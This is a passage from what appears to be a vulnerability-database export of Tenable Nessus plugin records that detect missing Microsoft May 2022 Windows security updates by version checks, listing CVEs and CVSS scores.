CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139,\n CVE-2022-29141)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2022-29133)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5013943\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5013943\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5013943'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:22000,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013943])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-19T22:27:38", "description": "The remote Windows host is missing security update 5013945. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5013945: Windows 10 version 1909 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22019", "CVE-2022-23270", "CVE-2022-23279", "CVE-2022-24466", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26927", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29112", "CVE-2022-29113", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29121", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29131", "CVE-2022-29132", "CVE-2022-29137", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-29142", "CVE-2022-30138"], "modified": "2022-08-19T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5013945.NASL", "href": "https://www.tenable.com/plugins/nessus/160938", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160938);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/19\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22011\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22016\",\n \"CVE-2022-22019\",\n \"CVE-2022-23270\",\n \"CVE-2022-23279\",\n \"CVE-2022-24466\",\n \"CVE-2022-26913\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26927\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29105\",\n \"CVE-2022-29112\",\n \"CVE-2022-29113\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29121\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29131\",\n \"CVE-2022-29132\",\n \"CVE-2022-29137\",\n \"CVE-2022-29139\",\n \"CVE-2022-29140\",\n \"CVE-2022-29141\",\n \"CVE-2022-29142\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5013945\");\n script_xref(name:\"MSFT\", value:\"MS22-5013945\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5013945: Windows 10 version 1909 Security Update (May 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5013945. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139,\n CVE-2022-29141)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5013945\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5013945\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5013945'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:18363,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013945])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-20T00:26:57", "description": "The remote Windows host is missing security update 5013952. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5013952: Windows 10 Version 1607 and Windows Server 2016 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22019", "CVE-2022-23270", "CVE-2022-24466", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26932", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26937", "CVE-2022-26938", "CVE-2022-26939", "CVE-2022-29102", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29106", "CVE-2022-29112", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29120", "CVE-2022-29121", "CVE-2022-29122", "CVE-2022-29123", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29132", "CVE-2022-29134", "CVE-2022-29135", "CVE-2022-29137", "CVE-2022-29138", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-29150", "CVE-2022-29151", "CVE-2022-30130", "CVE-2022-30138"], "modified": "2022-11-18T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5013952.NASL", "href": "https://www.tenable.com/plugins/nessus/160934", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160934);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/18\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22011\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22016\",\n \"CVE-2022-22019\",\n \"CVE-2022-23270\",\n \"CVE-2022-24466\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26932\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-26937\",\n \"CVE-2022-26938\",\n \"CVE-2022-26939\",\n \"CVE-2022-29102\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29105\",\n \"CVE-2022-29106\",\n \"CVE-2022-29112\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29120\",\n \"CVE-2022-29121\",\n \"CVE-2022-29122\",\n \"CVE-2022-29123\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29132\",\n \"CVE-2022-29134\",\n \"CVE-2022-29135\",\n \"CVE-2022-29137\",\n \"CVE-2022-29138\",\n \"CVE-2022-29139\",\n \"CVE-2022-29140\",\n \"CVE-2022-29141\",\n \"CVE-2022-29150\",\n \"CVE-2022-29151\",\n \"CVE-2022-30130\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5013952\");\n script_xref(name:\"MSFT\", value:\"MS22-5013952\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0202-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5013952: Windows 10 Version 1607 and Windows Server 2016 Security Update (May 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5013952. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5013952\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5013952\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5013952'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:14393,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013952])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-19T22:27:20", "description": "The remote Windows host is missing security update 5013944. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5013944: Windows Server 2022 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22017", "CVE-2022-22019", "CVE-2022-23270", "CVE-2022-23279", "CVE-2022-24466", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26927", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26932", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26937", "CVE-2022-26938", "CVE-2022-26939", "CVE-2022-26940", "CVE-2022-29102", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29106", "CVE-2022-29112", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29120", "CVE-2022-29121", "CVE-2022-29122", "CVE-2022-29123", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29131", "CVE-2022-29132", "CVE-2022-29134", "CVE-2022-29135", "CVE-2022-29137", "CVE-2022-29138", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-29142", "CVE-2022-29150", "CVE-2022-29151", "CVE-2022-30138"], "modified": "2022-08-19T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5013944.NASL", "href": "https://www.tenable.com/plugins/nessus/160929", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160929);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/19\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22016\",\n \"CVE-2022-22017\",\n \"CVE-2022-22019\",\n \"CVE-2022-23270\",\n \"CVE-2022-23279\",\n \"CVE-2022-24466\",\n \"CVE-2022-26913\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26927\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26932\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-26937\",\n \"CVE-2022-26938\",\n \"CVE-2022-26939\",\n \"CVE-2022-26940\",\n \"CVE-2022-29102\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29106\",\n \"CVE-2022-29112\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29120\",\n \"CVE-2022-29121\",\n \"CVE-2022-29122\",\n \"CVE-2022-29123\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29131\",\n \"CVE-2022-29132\",\n \"CVE-2022-29134\",\n \"CVE-2022-29135\",\n \"CVE-2022-29137\",\n \"CVE-2022-29138\",\n \"CVE-2022-29139\",\n \"CVE-2022-29140\",\n \"CVE-2022-29141\",\n \"CVE-2022-29142\",\n \"CVE-2022-29150\",\n \"CVE-2022-29151\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5013944\");\n script_xref(name:\"MSFT\", value:\"MS22-5013944\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5013944: Windows Server 2022 Security Update (May 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5013944. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139,\n CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5013944\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5013944\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 